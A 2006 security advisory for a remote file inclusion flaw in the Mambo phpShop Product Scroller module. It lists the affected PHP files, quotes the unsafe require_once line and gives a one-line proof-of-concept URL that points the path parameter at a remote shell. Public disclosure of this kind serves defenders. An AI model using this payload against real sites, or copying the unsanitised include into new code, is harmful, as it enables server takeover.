mambo-phphop Product Scroller Module R.F.I

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13967
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

    ###########################################################################################
    #            Aria-Security.net Advisory                                        #
    #            Discovered  by: O.U.T.L.A.W                                       #

    #            < www.Aria-security.net >                                            #
    #        Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                            #
    #                                                                    #
    ###########################################################################################

Software: mambo-phphop Product Scroller Module

Attack method: Remote File Inclusion

Source:

/ Load the phpshop main parse code / require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );


Vulnarable Files:

mod_phpshop.php
mod_phpshop_allinone.php
mod_phpshop_cart.php
mod_phpshop_featureprod.php
mod_phpshop_latestprod.php
mod_product_categories.php
mod_productscroller.php
mosproductsnap.php

Proof of Concept:

one of the files above.php?mosConfig_absolute_path=SHELL

----------------------------------------------------------

Contact : Outlaw@aria-security.net